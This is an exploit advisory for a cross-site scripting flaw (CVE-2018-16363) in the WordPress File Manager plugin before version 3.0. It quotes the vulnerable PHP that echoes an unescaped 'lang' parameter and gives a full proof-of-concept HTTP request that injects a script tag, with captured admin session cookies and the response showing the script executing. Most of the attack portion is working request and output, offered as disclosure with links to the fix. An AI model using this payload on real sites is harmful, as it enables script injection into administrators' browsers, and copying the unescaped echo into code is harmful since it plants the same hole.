file:file_folder_manager.php
code:set_transient( 'wp_fm_lang', $_GET['lang'] , 60 60 720 );

file:lib\wpfilemanager.php
code:var fmlang = "<?php echo isset($_GET['lang']) ? $_GET['lang'] : ($wp_fm_lang !== false) ? $wp_fm_lang : 'en';?>";

poc:

request

GET /blog/wp-admin/admin.php?page=wp_file_manager&lang=zh_CN</script><script>alert(1234567890)</script> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: wordpress_5aa6a4a225f40db86349342d0826a90c=admin%7C1535989327%7CKko2gM0P0FjhgEpNTIqRneg9Ky7aKaqWloRFGrsyw6q%7C71f1ed8075d5a34b82548bb0a92e6b6338ecf8fba0adc57da627d55f07693220; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5aa6a4a225f40db86349342d0826a90c=admin%7C1535989327%7CKko2gM0P0FjhgEpNTIqRneg9Ky7aKaqWloRFGrsyw6q%7C5fbc26f57a4eaf15c60c5840d5fa14f296e3bb1c66e567358d761a3963d1bb82; wp-settings-1=deleted; wp-settings-time-1=1535770900; PHPSESSID=501108188d8569138517f08ba9741c92
Connection: close
Upgrade-Insecure-Requests: 1

response

HTTP/1.1 200 OK
Date: Sat, 01 Sep 2018 15:55:34 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47316

<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8 wp-toolbar"  lang="zh-CN">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" class="wp-toolbar"  lang="zh-CN">
<!--<![endif]-->
.........
<script>
var security_key = "b3ee874749";
<strong>var fmlang = "zh_CN</script><script>alert(1234567890)</script>";</strong>
var vle_nonce = "863ad12aa7";
.........
</body>
</html>

Exploit Title: WordPress Plugin File Manager 2.9 - storage type XSS

Exploit Author: ly55521

Google Dork: N/A

Type: XSS

Date: 2018-09-02

Vendor Homepage: N/A

Software Link: https://wordpress.org/plugins/wp-file-manager/

Affected Version: < 3.0

Tested on: Kali OS

CVE : CVE-2018-16363

Related links:

Update record: http://plugins.trac.wordpress.org/changeset/1936043
EXP: https://blog.51cto.com/010bjsoft/2171087
Loophole notification: https://wordpress.org/support/topic/security-concern-6/#post-10655739
safelink:https://wordpress.org/plugins/wp-file-manager/